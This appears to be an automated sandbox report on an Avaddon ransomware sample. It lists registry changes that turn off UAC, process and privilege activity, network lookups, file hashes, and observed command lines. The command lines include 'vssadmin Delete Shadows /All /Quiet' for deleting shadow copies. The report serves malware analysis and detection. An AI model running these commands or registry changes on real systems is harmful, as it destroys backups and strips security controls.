Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A

Suspicious behavior: EnumeratesProcesses

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A

Suspicious use of AdjustPrivilegeToken

Description	Indicator	Process	Target
Token: SeIncreaseQuotaPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeLoadDriverPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeSystemProfilePrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeSystemtimePrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeProfSingleProcessPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeIncBasePriorityPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeSystemEnvironmentPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeRemoteShutdownPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeUndockPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeManageVolumePrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: 33	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: 34	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: 35	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeAuditPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeIncreaseQuotaPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeLoadDriverPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeSystemProfilePrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeSystemtimePrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeProfSingleProcessPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeIncBasePriorityPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeSystemEnvironmentPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeRemoteShutdownPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeUndockPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeManageVolumePrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: 33	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: 34	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: 35	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeIncreaseQuotaPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeLoadDriverPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeSystemProfilePrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeSystemtimePrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeProfSingleProcessPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeIncBasePriorityPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeSystemEnvironmentPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeRemoteShutdownPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeUndockPrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: SeManageVolumePrivilege	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: 33	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: 34	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A
Token: 35	N/A	C:\Windows\SysWOW64\Wbem\wmic.exe	N/A

Suspicious use of FindShellTrayWindow

Description	Indicator	Process	Target
N/A	N/A	C:\Program Files\Internet Explorer\iexplore.exe	N/A

Suspicious use of SetWindowsHookEx

Description	Indicator	Process	Target
N/A	N/A	C:\Program Files\Internet Explorer\iexplore.exe	N/A
N/A	N/A	C:\Program Files\Internet Explorer\iexplore.exe	N/A
N/A	N/A	C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE	N/A
N/A	N/A	C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE	N/A
N/A	N/A	C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE	N/A
N/A	N/A	C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE	N/A

Suspicious use of WriteProcessMemory

Description	Indicator	Process	Target
PID 2716 wrote to memory of 2144	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	C:\Windows\SysWOW64\Wbem\wmic.exe
PID 2716 wrote to memory of 2144	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	C:\Windows\SysWOW64\Wbem\wmic.exe
PID 2716 wrote to memory of 2144	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	C:\Windows\SysWOW64\Wbem\wmic.exe
PID 2716 wrote to memory of 2144	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	C:\Windows\SysWOW64\Wbem\wmic.exe
PID 2716 wrote to memory of 1460	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	C:\Windows\SysWOW64\vssadmin.exe
PID 2716 wrote to memory of 1460	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	C:\Windows\SysWOW64\vssadmin.exe
PID 2716 wrote to memory of 1460	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	C:\Windows\SysWOW64\vssadmin.exe
PID 2716 wrote to memory of 1460	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	C:\Windows\SysWOW64\vssadmin.exe
PID 2716 wrote to memory of 2004	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	C:\Windows\SysWOW64\Wbem\wmic.exe
PID 2716 wrote to memory of 2004	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	C:\Windows\SysWOW64\Wbem\wmic.exe
PID 2716 wrote to memory of 2004	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	C:\Windows\SysWOW64\Wbem\wmic.exe
PID 2716 wrote to memory of 2004	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	C:\Windows\SysWOW64\Wbem\wmic.exe
PID 2716 wrote to memory of 2496	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	C:\Windows\SysWOW64\vssadmin.exe
PID 2716 wrote to memory of 2496	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	C:\Windows\SysWOW64\vssadmin.exe
PID 2716 wrote to memory of 2496	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	C:\Windows\SysWOW64\vssadmin.exe
PID 2716 wrote to memory of 2496	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	C:\Windows\SysWOW64\vssadmin.exe
PID 2716 wrote to memory of 448	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	C:\Windows\SysWOW64\Wbem\wmic.exe
PID 2716 wrote to memory of 448	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	C:\Windows\SysWOW64\Wbem\wmic.exe
PID 2716 wrote to memory of 448	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	C:\Windows\SysWOW64\Wbem\wmic.exe
PID 2716 wrote to memory of 448	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	C:\Windows\SysWOW64\Wbem\wmic.exe
PID 2716 wrote to memory of 768	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	C:\Windows\SysWOW64\vssadmin.exe
PID 2716 wrote to memory of 768	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	C:\Windows\SysWOW64\vssadmin.exe
PID 2716 wrote to memory of 768	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	C:\Windows\SysWOW64\vssadmin.exe
PID 2716 wrote to memory of 768	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	C:\Windows\SysWOW64\vssadmin.exe
PID 2208 wrote to memory of 1192	N/A	C:\Program Files\Internet Explorer\iexplore.exe	C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2208 wrote to memory of 1192	N/A	C:\Program Files\Internet Explorer\iexplore.exe	C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2208 wrote to memory of 1192	N/A	C:\Program Files\Internet Explorer\iexplore.exe	C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2208 wrote to memory of 1192	N/A	C:\Program Files\Internet Explorer\iexplore.exe	C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

System policy modification

evasion

Description	Indicator	Process	Target
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe	N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe"

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Downloads\807042-readme.html

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2208 CREDAT:275457 /prefetch:2

Network

Country	Destination	Domain	Proto
US	8.8.8.8:53	api.myip.com	udp
US	104.26.9.59:443	api.myip.com	tcp
US	8.8.8.8:53	apps.identrust.com	udp
GB	2.18.190.81:80	apps.identrust.com	tcp
US	8.8.8.8:53	x2.c.lencr.org	udp
GB	184.25.193.61:80	x2.c.lencr.org	tcp
US	8.8.8.8:53	crl.microsoft.com	udp
GB	2.18.190.71:80	crl.microsoft.com	tcp

Files

C:\Users\Admin\AppData\Local\Temp\Cab3767.tmp

MD5	49aebf8cbd62d92ac215b2923fb1b9f5
SHA1	1723be06719828dda65ad804298d0431f6aff976
SHA256	b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512	bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar37F7.tmp

MD5	4ea6026cf93ec6338144661bf1202cd1
SHA1	a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256	8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512	6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5	a20cb81bfe77a9e08d37563d856edfaa
SHA1	82d09b3c3fb304089f0bd859b5bb620b48402878
SHA256	668815330e3162fc6b13968cdb3c1794ed824ef665beb380d5a6014edb42fcc3
SHA512	a7e7f36dd97735ecfb28a56bb1cc7b036796d887dfbbb901ffe76a7b6821757432ddb12cb60fcf56b861f2e84a5e86db1609dba4140e46b5f5d1cc07e021b022

C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\807042-readme.html

MD5	98e2e4139c51b21f2228cbb43c221b2c
SHA1	b9fe91fc2f73f81e154107f02cff0903b707cb64
SHA256	cf754857b5dd3f1caa66b68821b16f3a436cca0981c700463784894deaa053cd
